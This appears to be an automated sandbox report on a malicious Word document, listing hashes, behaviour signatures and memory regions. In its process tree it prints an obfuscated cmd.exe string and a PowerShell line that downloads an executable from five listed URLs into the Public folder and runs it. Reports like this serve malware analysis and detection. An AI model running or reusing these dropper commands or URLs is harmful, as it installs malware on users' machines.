Analysis

  • max time kernel
    138s
  • max time network
    128s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240508-en
  • resource tags
    arch:x64, arch:x86, image:win10v2004-20240508-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    28/05/2024, 21:08

General

  • Target

    7e6980371f32c621d20998ef8e211bac_JaffaCakes118.doc

  • Size

    66KB

  • MD5

    7e6980371f32c621d20998ef8e211bac

  • SHA1

    593532859a14a3cd2f46eba73f5398641544d551

  • SHA256

    6ccd4c745fb1d6d9e1629b3eb80fc7e8286c902e3629f59a3677d3b9375497e0

  • SHA512

    5a328991d18a379fc5606b757cd7c9c3da2500bc4ae7ac0d33401b1bb0d51ecbff2cb02adf5b4239807a1460b58dee4127e79383cd93724d708da797e60b1364

  • SSDEEP

    768:BpJcaUitGAlmrJpmxlzC+w99NBs+1owTRj5EnAYspPZiFfqPd:BptJlmrJpmxlRw99NBs+awly9spPZO

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://laschuk.com.br/C7f65h8p

exe.dropper

http://jobarba.com/wp-content/nY7NWG7z

exe.dropper

http://familiekoning.net/YT9gzKUs

exe.dropper

http://www.ultigamer.com/wp-admin/includes/OCklr3Q

exe.dropper

http://fluorescent.cc/ttQoKkJ4sC

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 4 IoCs
  • An obfuscated cmd.exe command-line is typically used to evade detection. 1 IoCs
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 7 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\7e6980371f32c621d20998ef8e211bac_JaffaCakes118.doc" /o ""
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1472
    • C:\Windows\SYSTEM32\cmd.exe
      cmd /V^:/C"^se^t ^3^s^H= ^ ^ ^ ^ ^ }^}{hctac}^;^kaerb^;q^jV$ ^metI-e^kovn^I^;)^qjV^$ ^,r^YC^$(^eli^Fdaoln^w^o^D.Vn^F^$^{yrt{)^T^wi$^ n^i^ rYC^$(^hc^a^erof^;'^e^xe.^'+^B^d^Y^$+'^\^'+c^ilbu^p^:vn^e$^=^qjV$^;^'8^4^3'^ =^ B^dY$;)'^@'(^t^i^lpS^.'Cs^4Jk^K^oQt^t/cc.^tn^ec^seroulf//^:^p^tt^h^@Q3rl^kCO/^sedulcn^i/n^i^md^a-^pw/^m^oc.re^mag^i^t^l^u^.^w^ww//^:^p^tt^h@^s^UKz^g^9^TY/^ten.gnino^ke^i^li^m^a^f//:^p^tt^h^@z^7^G^WN7^Yn/^tn^etnoc^-pw/^m^oc^.a^br^a^b^o^j//^:ptth^@^p8h5^6f^7C/rb^.m^oc.k^u^hcsal//:^p^tth'^=T^wi$^;tneilC^be^W^.^teN ^tcejb^o-wen^=VnF$ ^ll^e^h^sr^ewo^p&&f^or /^L %^g ^in (^3^9^7^;^-1;^0)^d^o s^et ^K^3^X^e=!^K^3^X^e!!^3^s^H:~%^g,1!&&^if %^g ^l^e^q ^0 c^a^l^l %^K^3^X^e:~^-3^9^8%"
      2⤵
      • Process spawned unexpected child process
      • An obfuscated cmd.exe command-line is typically used to evade detection.
      • Suspicious use of WriteProcessMemory
      PID:5052
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell $FnV=new-object Net.WebClient;$iwT='http://laschuk.com.br/C7f65h8p@http://jobarba.com/wp-content/nY7NWG7z@http://familiekoning.net/YT9gzKUs@http://www.ultigamer.com/wp-admin/includes/OCklr3Q@http://fluorescent.cc/ttQoKkJ4sC'.Split('@');$YdB = '348';$Vjq=$env:public+'\'+$YdB+'.exe';foreach($CYr in $iwT){try{$FnV.DownloadFile($CYr, $Vjq);Invoke-Item $Vjq;break;}catch{}}
        3⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4312

Network

MITRE ATT&CK Enterprise v15

Downloads

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ccpgyujh.3gn.ps1

    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • C:\Users\Admin\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\TM02851227[[fn=sist02]].xsl

    Filesize

    245KB

    MD5

    f883b260a8d67082ea895c14bf56dd56

    SHA1

    7954565c1f243d46ad3b1e2f1baf3281451fc14b

    SHA256

    ef4835db41a485b56c2ef0ff7094bc2350460573a686182bc45fd6613480e353

    SHA512

    d95924a499f32d9b4d9a7d298502181f9e9048c21dbe0496fa3c3279b263d6f7d594b859111a99b1a53bd248ee69b867d7b1768c42e1e40934e0b990f0ce051e

  • C:\Users\Public\348.exe

    Filesize

    114B

    MD5

    e89f75f918dbdcee28604d4e09dd71d7

    SHA1

    f9d9055e9878723a12063b47d4a1a5f58c3eb1e9

    SHA256

    6dc9c7fc93bb488bb0520a6c780a8d3c0fb5486a4711aca49b4c53fac7393023

    SHA512

    8df0ab2e3679b64a6174deff4259ae5680f88e3ae307e0ea2dfff88ec4ba14f3477c9fe3a5aa5da3a8e857601170a5108ed75f6d6975958ac7a314e4a336aed0

  • memory/1472-30-0x00007FFEA5670000-0x00007FFEA5939000-memory.dmp

    Filesize

    2.8MB

  • memory/1472-542-0x00007FFEA5670000-0x00007FFEA5939000-memory.dmp

    Filesize

    2.8MB

  • memory/1472-5-0x00007FFEA5670000-0x00007FFEA5939000-memory.dmp

    Filesize

    2.8MB

  • memory/1472-8-0x00007FFEA5670000-0x00007FFEA5939000-memory.dmp

    Filesize

    2.8MB

  • memory/1472-7-0x00007FFEA5670000-0x00007FFEA5939000-memory.dmp

    Filesize

    2.8MB

  • memory/1472-6-0x00007FFE653A0000-0x00007FFE653B0000-memory.dmp

    Filesize

    64KB

  • memory/1472-9-0x00007FFEA5670000-0x00007FFEA5939000-memory.dmp

    Filesize

    2.8MB

  • memory/1472-10-0x00007FFEA5670000-0x00007FFEA5939000-memory.dmp

    Filesize

    2.8MB

  • memory/1472-11-0x00007FFE653A0000-0x00007FFE653B0000-memory.dmp

    Filesize

    64KB

  • memory/1472-12-0x00007FFEA5670000-0x00007FFEA5939000-memory.dmp

    Filesize

    2.8MB

  • memory/1472-13-0x00007FFEA5670000-0x00007FFEA5939000-memory.dmp

    Filesize

    2.8MB

  • memory/1472-0-0x00007FFE67B10000-0x00007FFE67B20000-memory.dmp

    Filesize

    64KB

  • memory/1472-31-0x00007FFEA5670000-0x00007FFEA5939000-memory.dmp

    Filesize

    2.8MB

  • memory/1472-567-0x00007FFEA5670000-0x00007FFEA5939000-memory.dmp

    Filesize

    2.8MB

  • memory/1472-2-0x00007FFE67B10000-0x00007FFE67B20000-memory.dmp

    Filesize

    64KB

  • memory/1472-3-0x00007FFE67B10000-0x00007FFE67B20000-memory.dmp

    Filesize

    64KB

  • memory/1472-1-0x00007FFE67B10000-0x00007FFE67B20000-memory.dmp

    Filesize

    64KB

  • memory/1472-522-0x00007FFEA5670000-0x00007FFEA5939000-memory.dmp

    Filesize

    2.8MB

  • memory/1472-541-0x00007FFEA5670000-0x00007FFEA5939000-memory.dmp

    Filesize

    2.8MB

  • memory/1472-4-0x00007FFE67B10000-0x00007FFE67B20000-memory.dmp

    Filesize

    64KB

  • memory/1472-543-0x00007FFEA5670000-0x00007FFEA5939000-memory.dmp

    Filesize

    2.8MB

  • memory/1472-563-0x00007FFE67B10000-0x00007FFE67B20000-memory.dmp

    Filesize

    64KB

  • memory/1472-566-0x00007FFE67B10000-0x00007FFE67B20000-memory.dmp

    Filesize

    64KB

  • memory/1472-565-0x00007FFE67B10000-0x00007FFE67B20000-memory.dmp

    Filesize

    64KB

  • memory/1472-564-0x00007FFE67B10000-0x00007FFE67B20000-memory.dmp

    Filesize

    64KB

  • memory/4312-38-0x00000175A6360000-0x00000175A6382000-memory.dmp

    Filesize

    136KB